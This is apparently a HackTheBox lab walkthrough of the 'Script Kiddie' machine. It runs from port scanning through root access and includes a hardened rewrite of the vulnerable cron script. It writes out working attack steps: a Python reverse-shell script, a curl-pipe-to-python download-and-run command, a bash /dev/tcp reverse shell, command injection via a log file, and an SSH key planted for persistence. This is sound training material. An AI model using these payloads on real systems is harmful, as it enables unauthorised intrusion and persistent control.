HackTheBox - Script Kiddie

We’ll be covering Script Kiddie, an easy machine from HackTheBox with several interesting attack vectors.


Nmap scan results

Starting off with a simple nmap scan.

┌──(root@LAPTOP-UFMALO92)-[/home/akshay/Desktop/HackTheBox/Machines/ScriptKiddie]
└─# nmap -sC -sV -T4 kiddie.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 17:52 IST
Nmap scan report for kiddie.htb (10.10.10.226)
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.18 seconds

We will keep the all-port scan running in the background.

nmap -A -T4 -p- --max-retries 2 -oN nmap-all-port-scan 10.10.10.226

Analyzing open ports

Now that we know there is a Python (Werkzeug) web server on port 5000, we can browse the website for more information. My first guess is the /console endpoint: when the Werkzeug debugger is enabled, that endpoint exposes an interactive console that executes Python code from within the browser.

But that endpoint is missing, so let’s start with manual enumeration.


It looks like we can generate Meterpreter payloads here. There’s also an IP scanner, which just runs Nmap in the back-end, so it is a natural candidate for command injection.

Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system via a vulnerable application. It becomes possible when an application passes unsafe user-supplied data (form fields, cookies, HTTP headers, etc.) to a system shell.

One can try various command injection payloads from here.

I tried various payloads to get OS Injection but none of them seemed to work.

msfvenom APK template command injection

I found this article that explains a command injection vulnerability in Metasploit Framework's msfvenom payload generator.

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

This can be exploited by crafting a malicious APK file.

Proof Of Concept - https://www.exploit-db.com/exploits/49491

The website lets us upload a template file for payload generation, which is exactly what this vulnerability needs and can lead to Remote Code Execution.


Payload to test: ping -c 3 10.10.14.115

First I will ping myself to check whether this is working. So let’s create a payload with the above command.


Getting a reverse shell

# Python reverse shell
import socket, subprocess, os

# Connect back to the listener, bind stdin/stdout/stderr to the socket,
# then hand the connection an interactive shell.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.115", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

We save this Python script as shell.py, serve it over HTTP from our machine on port 8000, and fetch and run it on the target with curl.

Payload: curl http://10.10.14.115:8000/shell.py | python3


And we get a shell.

Privilege Escalation

Generating SSH keys for persistence

└─# ssh-keygen -f kid
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in kid
Your public key has been saved in kid.pub

Now I will add my public key into /home/kid/.ssh/authorized_keys so that I can have SSH Access to the machine using my private key.

kid@scriptkiddie:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5c+JNvJN/2omxgUkgClSyx4TdQ6gcy9SK41L4UT/3fl6j+yDa9ZYRmylnpX3A4Xms+5bkdBCQmeFPTuWlf6J9rZ22y4i3XPbFGnnEDEPmcoRCGuqI9KKJgktW6ysuqiq8+RxDAeWAd9aHFZqVUNqif+5ZbW8aSDFu1hBSQe9wdt7sv/B43eAFvA5m2wr0y+7+ejAk5...' >> /home/kid/.ssh/authorized_keys
kid@scriptkiddie:~/.ssh$ chmod 600 authorized_keys


Using pspy to get the list of running processes

I will open up two windows, one with pspy running and the other with a shell, so that we can monitor the commands as well as the processes.

So there’s a logs directory containing a file named hackers. As soon as we write something to it, the content gets wiped. It looks like some kind of cron job is running in the background that executes something based on that file.


There is a file scanlosers.sh in /home/pwn which looks like it is the script being executed.

#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
# Everything from the third space-separated field onward is treated as an IP
# and interpolated, unquoted and unvalidated, into a string handed to sh -c.
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
# Truncate the log after each run, which is why the file appears to be "deleted".
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

So the script reads the hackers file, takes everything from the third space-separated field onward (cut -d' ' -f3-), and interpolates each unique value as the IP into a command string that is executed by sh -c. Nothing is validated, so if I inject something malicious into that position it will get executed as the pwn user. Let’s try adding id and verify it using pspy.

random random $(id) 

Add the above line to the hackers file and make sure pspy is running somewhere so that you can monitor the result.
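The root cause here is that scanlosers.sh trusts whatever lands in the third field of the log and re-parses it through sh -c. As an added example (not the machine's script), here is a hardened counterpart in POSIX sh that validates each extracted target as a dotted-quad IPv4 address and passes it to the scanner as a separate argument instead of inside a shell string. The names is_ipv4, extract_targets, scan_targets and the SCANNER override variable are my own, and the log lines used to exercise it are constructed.

```shell
#!/bin/sh
# Hardened counterpart to scanlosers.sh (added example, not the machine's script).
# Fix 1: each extracted target must be a syntactically valid dotted-quad IPv4.
# Fix 2: the target is passed to the scanner as its own argument, never
#        interpolated into a string that sh -c would re-parse.

# is_ipv4 WORD: succeed only if WORD is a.b.c.d with each octet in 0-255.
is_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # empty, chars outside [0-9.], leading/trailing/double dots
    esac
    IFS=. read -r o1 o2 o3 o4 rest <<EOF
$1
EOF
    [ -z "$rest" ] || return 1                 # more than four octets
    for octet in "$o1" "$o2" "$o3" "$o4"; do
        case "$octet" in
            ""|????*) return 1 ;;              # missing octet or more than three digits
        esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# extract_targets LOGFILE: the same `cut -d' ' -f3- | sort -u` pipeline as the
# original, but only validated IPs reach stdout; anything else goes to stderr.
extract_targets() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r target; do
        if is_ipv4 "$target"; then
            printf '%s\n' "$target"
        else
            printf 'rejected non-IP target: %s\n' "$target" >&2
        fi
    done
}

# scan_targets LOGFILE: run the scanner once per validated target, with the
# target as a separate argv element. SCANNER (hypothetical override) defaults
# to nmap; it exists so the function can be exercised with a stub such as echo.
scan_targets() {
    extract_targets "$1" 2>/dev/null | while IFS= read -r ip; do
        "${SCANNER:-nmap}" --top-ports 10 -oN "recon/${ip}.nmap" "$ip"
    done
}

# Usage: sh hardened_scan.sh /home/kid/logs/hackers
if [ "$#" -gt 0 ]; then
    scan_targets "$1"
fi
```

With this in place a log line such as `random random $(id)` is dropped with a message on stderr rather than reaching a shell, and even a target that slipped past validation could not be re-parsed because it is never placed inside a command string.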


Shell as pwn user

Now that we have code execution as the pwn user, we can get a reverse shell.

random random $(bash -c "bash -i >& /dev/tcp/10.10.14.115/9001 0>&1")


pwn@scriptkiddie:~$ sudo -l                 
Matching Defaults entries for pwn on scriptkiddie:                              
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
                                               
User pwn may run the following commands on scriptkiddie:           
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\
       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
Metasploit tip: Use help <command> to learn more about any command
msf6 > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf6 > bash
[*] exec: bash
root@scriptkiddie:/home/pwn# id
uid=0(root) gid=0(root) groups=0(root)